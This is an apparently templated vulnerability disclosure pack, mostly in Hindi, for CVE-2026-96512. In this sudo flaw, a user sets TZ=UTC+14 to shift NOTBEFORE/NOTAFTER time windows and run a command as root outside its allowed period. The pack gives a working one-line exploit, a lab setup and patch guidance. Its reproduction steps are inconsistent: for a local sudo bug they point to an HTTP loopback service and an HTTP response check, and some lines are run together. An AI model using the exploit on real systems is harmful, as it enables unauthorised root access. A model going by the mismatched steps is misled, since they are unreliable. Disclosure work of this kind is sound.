
CVE-2026-96512 के लिए डिस्क्लोज़र पैक और PoC, जो sudo NOTBEFORE/NOTAFTER TZ समय-विंडो बायपास है जो स्थानीय विशेषाधिकार एस्केलेशन को सक्षम बनाता है, साथ में लैब प्रजनन और पैच मार्गदर्शन।
abraxaslabs.tech · github.com/abraxas · @abraxas_null · CVE-2026-96512
sudo 1.9.13p3 (Debian bookworm) — Sudo Project
sudo में एक त्रुटि पाई गई। जब sudoers नियम NOTBEFORE या NOTAFTER समय-आधारित एक्सेस प्रतिबंधों का उपयोग करते हैं और टाइमस्टैम्प में अंत में Z टाइमज़ोन संकेतक नहीं होता, तो समय मूल्यांकन कॉल करने वाले उपयोगकर्ता से विरासत में मिले TZ एनवायरनमेंट वेरिएबल पर निर्भर करता है।
| CVE | CVE-2026-96512 · CVE.org |
| CWE | CWE-863 |
| CVSS | High: 7.8 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| Product | sudo |
| Affected | 1.9.13p3 (Debian bookworm) तक के सभी संस्करण (सम्मिलित) |
| Patched | main commit 1820a34 (अभी तक कोई अपस्ट्रीम रिलीज़ नहीं) और बाद के संस्करण |
| Auth | प्रमाणित (स्रोत मैप देखें) |
| License | GNU Affero GPL v3.0 |
| Lab | केवल 127.0.0.1 · विक्रेता/क्लाइंट डिस्क्लोज़र पैक, स्कैनर नहीं |
plugins/sudoers parse_gentime / gram.y timespec. Fix sudo-project/sudo@1820a34 environ को envp से कॉपी करता है और TZ को unsetenv करता है।
LOCALTZ=UTC+14 sudo -n /usr/bin/idsudoers: labuser ALL=(root) NOPASSWD: NOTAFTER=<now-1h no Z> /usr/bin/idlabuser sudo -n /usr/bin/id -> denied (expired)TZ=UTC+14 sudo -n /usr/bin/idparse_gentime mktime POSIX TZ=UTC+14 का पालन करता हैNOTAFTER epoch +14h शिफ्ट होता है; कमांड को root के रूप में अनुमति दी जाती हैTZ के बिना: sudo -n id अस्वीकृत। TZ=UTC+14 के साथ: uid=0(root)।
पहले यह करें: sudo को main commit 1820a34 (अभी तक कोई अपस्ट्रीम रिलीज़ नहीं) या नए संस्करण में अपडेट करें।
अपग्रेड के बाद सत्यापित करें
CVE-2026-96512-Abraxas-Labs.py को फिर से चलाएँ: मैप किया गया साक्ष्य नहीं दिखना चाहिए।यदि आप तुरंत अपडेट नहीं कर सकते
लक्ष्य केवल http://127.0.0.1:8088 (या जो लूपबैक आपने बाइंड किया है)। इस स्क्रिप्ट को इंटरनेट पर न लक्षित करें।
python3 CVE-2026-96512-Abraxas-Labs.py
सफलता प्रतिक्रिया बॉडी में ऊपर दिया गया साक्ष्य है। सामान्य 200 HTML यह नहीं है।
पुनरुत्पादन के लिए उपयोग किया गया लूपबैक स्टैक। आधिकारिक इमेज, जब तक इस फ़ोल्डर में कोई Dockerfile स्रोत से बिल्ड न करे।
cd lab
docker compose up --force-recreate
यदि YAML किसी स्थानीय डायरेक्टरी को माउंट करता है (संस्करण तालिका से प्लगइन ज़िप / स्रोत टैग) तो कम्पोज़ के बगल में कमजोर उत्पाद ट्री को बाइंड करें। 127.0.0.1 के अलावा कुछ भी प्रकाशित न करें।
github.com/sudo-project/sudo/commit/1820a349687522f51023d1ae5925125f59679a8c
Abraxas Labs: abraxaslabs.tech · github.com/abraxas · @abraxas_null
# CVE-2026-96512
CWE: CWE-863
CVSS: High 7.8 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (Red Hat).
## Description
sudoers `NOTBEFORE`/`NOTAFTER` timestamps without a trailing `Z` are converted with `mktime()`, which follows the caller’s `TZ`. A local user who is already named in such a rule can shift the window by up to ~25 hours (POSIX `TZ=UTC+14`) and run the allowed command outside the intended period. PAM authentication is unchanged.
## Product
sudo 1.9.13p3 on Debian bookworm (upstream 1.8.20–1.9.17p2). Fix in main `1820a34`; no upstream tarball yet at disclosure. Lab oracle is `uid=0(root)` via TZ, not a shell.
यह डिस्क्लोज़र पैक GNU Affero General Public License v3.0 के अंतर्गत लाइसेंस प्राप्त है। देखें LICENSE।
यह पैक विक्रेता, साइट स्वामी और लाइसेंस प्राप्त लैब के लिए है। स्क्रिप्ट 127.0.0.1 से बात करती है। उन सिस्टम के विरुद्ध इसका उपयोग करना जो आपके स्वामित्व में नहीं हैं, Abraxas Labs द्वारा अधिकृत नहीं है। कोई वारंटी नहीं।